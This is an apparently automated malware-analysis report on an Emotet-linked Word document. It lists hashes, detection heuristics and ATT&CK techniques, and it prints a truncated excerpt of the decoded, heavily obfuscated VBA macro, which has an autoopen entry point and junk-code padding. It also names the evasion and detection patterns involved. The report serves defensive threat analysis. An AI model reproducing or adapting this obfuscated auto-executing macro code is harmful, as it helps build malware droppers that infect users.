Emotet Office (OLE) malware analysis — malicious · 7de845cb1aafd42e

MALICIOUS

Office (OLE)

152.4 KB Created: 2019-04-30 07:06:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 647a238bd1ea919b48b3b93272703d35 SHA-1: 490fc66bd5a183867e4033f31bd19e5d6cffaf54 SHA-256: 7de845cb1aafd42eccb29a42fb8a3bc4820d429d7dab8ecd89ee2c09c6d59657

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the macro attempts to create a process using WMI. The presence of an AutoOpen macro and obfuscated API names like 'winmgmts' further supports this. ClamAV detection as 'Doc.Dropper.Emotet-6959413-0' strongly suggests the Emotet family, which commonly uses macros to download and execute secondary payloads.

Heuristics 8

ClamAV: Doc.Dropper.Emotet-6959413-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6959413-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36105 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	36105 bytes
SHA-256: `868f08b8e316eb333d979b18d1194fde0f9f74c10f57ee99c7a46f33914042c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UAACGAAD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AAAAQQ" Attribute VB_Base = "0{0B512284-F430-4506-9FC2-FCBE06F503A0}{7E520107-E053-4282-9B9B-B41B090D7AD3}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "fAU41oQ" Attribute VB_Base = "0{B949597E-A9F2-475D-9C7C-986D6019A202}{0A1B9E09-687F-43E4-937A-F49267DEF3CD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "BAABAA_A" Sub autoopen() If UDAAAAG = kAwcAU_ Then ElseIf fAUoZDAA = dBAc1cUA Then PAwAADB = Hex(akkwAo1G + CSng(cAXACDCU / Tan(167129488 + 903275107))) ElseIf SQAQGDcA = LCAB_AA Then Po_kGk = Atn(107327096) + Int(258044091) ElseIf zUAQAQAX = KU_AxB Then U4AAAAUc = 909912934 + Atn(664243028) End If If KwXXAQBw = QoAUZD Then ElseIf aBC4AAAk = VZw4B_Q Then QB1UA1 = Hex(XXUAUkC + CSng(n4_D1kB / Tan(70089877 + 815851515))) ElseIf mA4ABD = KX41ow_C Then kUAwAU = Atn(155522645) + Int(456909790) ElseIf k_AZGA = iQBAAAA Then RBkBXA = 994008663 + Atn(122647363) End If SAD1xU If ScwCBA_ = w_DxAAA Then ElseIf KUB41B = MAADGD_ Then UXAcAX = Hex(jxDCAG + CSng(zDAGQGG / Tan(163801526 + 948138119))) ElseIf MQ1DoA = wQwAwC Then bUG_GA4G = Atn(733478620) + Int(579349806) ElseIf lQXxGAA = iXUAAx Then RUAXxk_1 = 49063898 + Atn(490386888) End If If mwAQAAxo = fxBAB4AB Then ElseIf s1ADCA = lA1DoB Then XQAUBXkX = Hex(YxUDAQA + CSng(XQDAx4 / Tan(877846445 + 163344670))) ElseIf akxUAAA = nGAAAB Then nDZZAQ = Atn(424307267) + Int(499486010) ElseIf zADGxDU = X1AXAk Then Y1QGAwB = 120015408 + Atn(795266781) End If If hcBDxDUQ = rU1_4AQ Then ElseIf nwDxZx = hB41kUkX Then RQ1_U_UA = Hex(U1BBB4AA + CSng(DAAAAGQw / Tan(729179840 + 15538554))) ElseIf ZAAAU1 = QDACUD1 Then Zo_AAA1X = Atn(32972560) + Int(708786670) ElseIf ZUCBkQkA = bAAAUcDo Then B_wAUAD = 781196586 + Atn(151843644) End If End Sub Function bZxwAA(B1GAoDAw) If qQ1BQkA = SUGBGXUo Then ElseIf WcAQc_A = V1AGBBx Then UAGU4X1 = Hex(BXAAACUU + CSng(M1DAQ1GA / Tan(613672690 + 722188243))) ElseIf iAA_Qo = kA4A4Uo Then pCAwDA = Atn(314052721) + Int(303530607) ElseIf EABGGA = TAQXBAc Then kABAAU4A = 765273534 + Atn(381075805) End If If lQowxQAw = wADAAXGB Then ElseIf iQAA_DUA = jAAAwDA Then SAAAUA = Hex(R1AGAGQ + CSng(WAAAABDQ / Tan(33840446 + 722655753))) ElseIf kQC1ZA = tAxAUD Then zABUQ1GX = Atn(632101263) + Int(402936384) ElseIf zUGDAQA = UkAAAA Then WCUDAB = 974832332 + Atn(144534929) End If Set bZxwAA = CVar(B1GAoDAw) If zUA1Ao = j_kAAAQQ Then ElseIf lBxACABU = MAkBxGQC Then hwABUDA = Hex(wGDQkCUX + CSng(zUUAAZDD / Tan(568937986 + 301147285))) ElseIf rBxXZ4Xw = TcBDAQ Then Q__XCAC = Atn(901336385) + Int(323025183) ElseIf mAoDxB = wAkxDoA Then mBA4DCcA = 501981629 + Atn(653549993) End If If AAQAQAUB = C4cUDD Then ElseIf b_QAco4 = ckcUBA Then TAUkcA1 = Hex(cADAUA + CSng(qwAB_AX / Tan(661794038 + 687471328))) ElseIf KGwC4Ac = WQUA1ADA Then IUAAxU = Atn(53140914) + Int(805866431) ElseIf KAAoBA = tAXUkA Then rDQQQU = 908092635 + Atn(536415111) End If If XGUAcG1 = A_ocAAA Then ElseIf iAcxAAA = hAwAkBo1 Then pZoZXAQQ = Hex(LkAXA_ + CSng(XxDQBAA / Tan(619926155 + 331780995))) ElseIf CkZBAZc = oDoD ... (truncated)

SHA-256: 868f08b8e316eb333d979b18d1194fde0f9f74c10f57ee99c7a46f33914042c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UAACGAAD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AAAAQQ"
Attribute VB_Base = "0{0B512284-F430-4506-9FC2-FCBE06F503A0}{7E520107-E053-4282-9B9B-B41B090D7AD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "fAU41oQ"
Attribute VB_Base = "0{B949597E-A9F2-475D-9C7C-986D6019A202}{0A1B9E09-687F-43E4-937A-F49267DEF3CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "BAABAA_A"
Sub autoopen()
   If UDAAAAG = kAwcAU_ Then
ElseIf fAUoZDAA = dBAc1cUA Then
            PAwAADB = Hex(akkwAo1G + CSng(cAXACDCU / Tan(167129488 + 903275107)))
ElseIf SQAQGDcA = LCAB_AA Then
            Po_kGk = Atn(107327096) + Int(258044091)
ElseIf zUAQAQAX = KU_AxB Then
            U4AAAAUc = 909912934 + Atn(664243028)
End If
   If KwXXAQBw = QoAUZD Then
ElseIf aBC4AAAk = VZw4B_Q Then
            QB1UA1 = Hex(XXUAUkC + CSng(n4_D1kB / Tan(70089877 + 815851515)))
ElseIf mA4ABD = KX41ow_C Then
            kUAwAU = Atn(155522645) + Int(456909790)
ElseIf k_AZGA = iQBAAAA Then
            RBkBXA = 994008663 + Atn(122647363)
End If
SAD1xU
   If ScwCBA_ = w_DxAAA Then
ElseIf KUB41B = MAADGD_ Then
            UXAcAX = Hex(jxDCAG + CSng(zDAGQGG / Tan(163801526 + 948138119)))
ElseIf MQ1DoA = wQwAwC Then
            bUG_GA4G = Atn(733478620) + Int(579349806)
ElseIf lQXxGAA = iXUAAx Then
            RUAXxk_1 = 49063898 + Atn(490386888)
End If
   If mwAQAAxo = fxBAB4AB Then
ElseIf s1ADCA = lA1DoB Then
            XQAUBXkX = Hex(YxUDAQA + CSng(XQDAx4 / Tan(877846445 + 163344670)))
ElseIf akxUAAA = nGAAAB Then
            nDZZAQ = Atn(424307267) + Int(499486010)
ElseIf zADGxDU = X1AXAk Then
            Y1QGAwB = 120015408 + Atn(795266781)
End If
   If hcBDxDUQ = rU1_4AQ Then
ElseIf nwDxZx = hB41kUkX Then
            RQ1_U_UA = Hex(U1BBB4AA + CSng(DAAAAGQw / Tan(729179840 + 15538554)))
ElseIf ZAAAU1 = QDACUD1 Then
            Zo_AAA1X = Atn(32972560) + Int(708786670)
ElseIf ZUCBkQkA = bAAAUcDo Then
            B_wAUAD = 781196586 + Atn(151843644)
End If
End Sub
Function bZxwAA(B1GAoDAw)
   If qQ1BQkA = SUGBGXUo Then
ElseIf WcAQc_A = V1AGBBx Then
            UAGU4X1 = Hex(BXAAACUU + CSng(M1DAQ1GA / Tan(613672690 + 722188243)))
ElseIf iAA_Qo = kA4A4Uo Then
            pCAwDA = Atn(314052721) + Int(303530607)
ElseIf EABGGA = TAQXBAc Then
            kABAAU4A = 765273534 + Atn(381075805)
End If
   If lQowxQAw = wADAAXGB Then
ElseIf iQAA_DUA = jAAAwDA Then
            SAAAUA = Hex(R1AGAGQ + CSng(WAAAABDQ / Tan(33840446 + 722655753)))
ElseIf kQC1ZA = tAxAUD Then
            zABUQ1GX = Atn(632101263) + Int(402936384)
ElseIf zUGDAQA = UkAAAA Then
            WCUDAB = 974832332 + Atn(144534929)
End If
Set bZxwAA = CVar(B1GAoDAw)
   If zUA1Ao = j_kAAAQQ Then
ElseIf lBxACABU = MAkBxGQC Then
            hwABUDA = Hex(wGDQkCUX + CSng(zUUAAZDD / Tan(568937986 + 301147285)))
ElseIf rBxXZ4Xw = TcBDAQ Then
            Q__XCAC = Atn(901336385) + Int(323025183)
ElseIf mAoDxB = wAkxDoA Then
            mBA4DCcA = 501981629 + Atn(653549993)
End If
   If AAQAQAUB = C4cUDD Then
ElseIf b_QAco4 = ckcUBA Then
            TAUkcA1 = Hex(cADAUA + CSng(qwAB_AX / Tan(661794038 + 687471328)))
ElseIf KGwC4Ac = WQUA1ADA Then
            IUAAxU = Atn(53140914) + Int(805866431)
ElseIf KAAoBA = tAXUkA Then
            rDQQQU = 908092635 + Atn(536415111)
End If
   If XGUAcG1 = A_ocAAA Then
ElseIf iAcxAAA = hAwAkBo1 Then
            pZoZXAQQ = Hex(LkAXA_ + CSng(XxDQBAA / Tan(619926155 + 331780995)))
ElseIf CkZBAZc = oDoD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.